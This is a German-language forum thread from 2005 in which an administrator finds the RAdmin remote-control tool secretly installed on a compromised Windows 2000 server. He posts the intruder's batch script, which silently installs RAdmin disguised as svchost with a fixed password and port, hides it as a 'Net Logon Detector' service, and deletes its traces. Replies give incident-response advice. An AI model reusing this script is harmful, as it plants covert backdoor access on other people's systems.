Dieser Beitrag ist schon älter. Bitte vergewissern Sie sich, dass die Rahmenbedingungen oder der enthaltene Lösungsvorschlag noch dem aktuellen Stand der Technik entspricht.

Angriff auf W2k Server - RAdmin

Mitglied: 3080
Als ich unseren Win2000 Server wegen der neusten Windows-Updates rebootet habe war auf einmal folgendes Symbol/Programm aktiv bzw. in der Taskleiste zu sehen:

<img src='/images/articles/1632a072e2b31656b01d16faa7dbf233-radmin.jpg' align='default' hspace='0' vspace='0' border='0'>

Nach hin- und hersuchen und Informationen einholen hab ich dann schliesslich einige Dateien in Winnt\Installer\{irgendeinHashwert} gefunden, unter anderem auch folgende Batch-Datei:

@echo off
rmico
svchost /install /silence
svchost /save /port:18 /pass:An30Gm34 /silence
net start R_server
svcinst -c R_server "Net Logon Detector"
del rmico.reg /a/f/q
del rmico.exe /a/f/q
del temp2.bat /a /f /q

Hier hat wohl jemand ein Fernadministrations-Tool installiert, aber könnt Ihr mir sagen was hier genau abläuft? Habe die dazugehörigen Dateien gelöscht, Einträge in der Registry unter dem Namen "RAdmin" entfernt, den Remote-Registry-Dienst gestoppt und den Server neu gestartet. Jetzt ist das Symbol zwar weg, aber mich würde trotzdem mal interessieren wie es dahinkommt und welchen Risiken der Server ausgesetzt ist damit sowas überhaupt möglich ist. Gibt es eine zuverlässige Firewall für W2k Server um sich vor soetwas zu schützen?

Content-Key: 5706

Url: https://administrator.de/contentid/5706

Ausgedruckt am: 18.06.2021 um 08:06 Uhr

Mitglied: 7217
7217 am 17.01.2005
Herzlichen Glückwunsch:

du hast mit deiner voreiligen Aktion sämtliche Beweise vernichtet! Was du cleverer hättest machen sollen wäre eine komplette Sicherung des Systems gewesen (vorher alle Netzwerkaktivitäten sichern, damit man weiss, in welchem Status das Gerät aktuell war und ob evtl. noch Verbindungen zum Feind bestanden haben).

Anschließend hätte ich den Server vom Netz genommen und "Forensik" betrieben, was genau bedeutet, dass man mal versucht herauszufinden, welche Löcher man sich denn in die Sicherheit seines Servers geschossen hat.

Firewalls (auf dem Server) dürften dich vor sowas nur sehr marginal schützen. Sicherer ist es, den Patchstatus des Servers aktuell zu halten und auf jeden unnötigen Schnickschnack zu verzichten.

Gruß, Mupfel
Mitglied: fresch-heit
fresch-heit am 18.01.2005
/ironie/
hast du echt ne direkte verbindungs ins inet... ohne firewall /virenscanner sowas gibts noch ;)) und ich wunder mich warum sich viren immer noch so verbreiten... tsss
/ironie/
Mitglied: 7217
7217 am 18.01.2005
Ich sprach von einer Firewall AUF dem Server... was ich VOR meinen Servern habe, ist ne ganz andere Geschichte.

Gruß, Mupfel
Mitglied: priez
priez am 07.03.2005
ich hab remoteadministrator zuhause aufm pc drauf. ist ein einfaches remote tool. soll einige lücken haben und knackbar sein.

ich hätte den Server vom Netz genommen (und wenn das nicht geht, zumindest den im server eingestellten "incoming port" gesperrt (standard 4899 oder so)). Danach hätte ich mir mal die logfiles angeschaut... oder wenn du eindeutig beim angriff benutzte dateien hast, alles im system mit dem gleichen erstelldatum (zeitraum) gesucht.

Wenn das Ding schon gelaufen ist ( >3 std), hast du praktisch keine chance mehr. Er hat damit vollzugriff und mit 1-3 scripten hat er vmware oder weiss sonst was dazuinstalliert.

Viel Spass beim neuinstallieren oO
Mitglied: priez
priez am 07.03.2005
nachtrag:

wenn du davor eine gute FW hast brauchst du auf dem server kaum noch eine. Du solltest lieber den patchstatus aktuell halten (wie schon gesagt wurde) und dir deine 3rd Party Programme, welche netzwerkdienste anbieten, mal genauer anschaun...
Heiß diskutierte Beiträge
Administrator.de Feedback
Neue Administrator Version
FrankVor 1 TagInformationAdministrator.de Feedback77 Kommentare

Hallo User, heute Nacht haben wir Release 5.9 unserer Seite veröffentlicht. Diese bringt ein paar grundlegende Neuerungen für unsere User mit sich: Die Suche nach ...

Windows 10
Windows 11 Vorabversion aufgetaucht
NixVerstehenVor 1 TagTippWindows 1024 Kommentare

Auf Deskmodder.de ist ein Bericht über eine im Netz aufgetauchte Vorabversion von Windows 11 aufgetaucht. Der Bericht: Deskmodder.de - Windows 11 Vorabversion Bericht Download der ...

Hardware
PC und Monitor über Entfernung verbinden
gelöst ben1300Vor 1 TagFrageHardware14 Kommentare

Guten Morgen :) folgende IST Situation: Ich habe einen Gaming PC, welchen meine Freundin gerne nutzt, z.B. für das "legendäre" Spiel Sims 4 ;) Normalerweise ...

Windows Server
Durchgeschliffener Drucker funktioniert auf dem Server nicht
Disse1987Vor 1 TagFrageWindows Server12 Kommentare

Hallo zusammen, wieder einmal muss ich mich an euch wenden da wir mit unserem Latein am Ende sind. Seid ein paar Tagen hat eine Kundin ...

Netzwerke
Internetprobleme seit Serverinstallation
beepboopVor 17 StundenFrageNetzwerke14 Kommentare

Guten Tag zusammen Bei einem Kunden habe ich ein sehr merkwürdiges Problem. Wir haben vor zwei Wochen einen Server beim Kunden installiert. Vorher waren nur ...

Sonstige Systeme
Womit ist eine Nextcloud am Besten zu betreiben. Linux-PC oder RaspiPI
gelöst frosch2Vor 20 StundenFrageSonstige Systeme16 Kommentare

Hallo, wieder einmal möchte ich eure Meinungen. Es soll eine nextcloud in einer produktiven Umgebung eingesetzt werden. Ca. 6 Aussendienst- und 7 Innendienstmitarbeiter. Zusammen 13 ...

Windows Server
Auf Active Directory Benutzer und Computer von Windows 10 zugreifen
RealThoreVor 1 TagFrageWindows Server9 Kommentare

Hallo zusammen, da wir in der Abteilung (10 Leute) uns regelmäßig um die RDP Sessions auf unseren DCs (2012 R2) prügeln, wolle ich mal nachfragen, ...

Windows Server
Server 2019, Privates Netzwerk nach Neustart auf dem Host
dlohnierVor 1 TagFrageWindows Server9 Kommentare

Hallo, ich habe einen WIndows Server 2016 den ich kürzlich von 2016 per In-Place-Upgrade auf 2019 gehoben habe. Ebenfalls die 3 Hyper-V VM's mit Server ...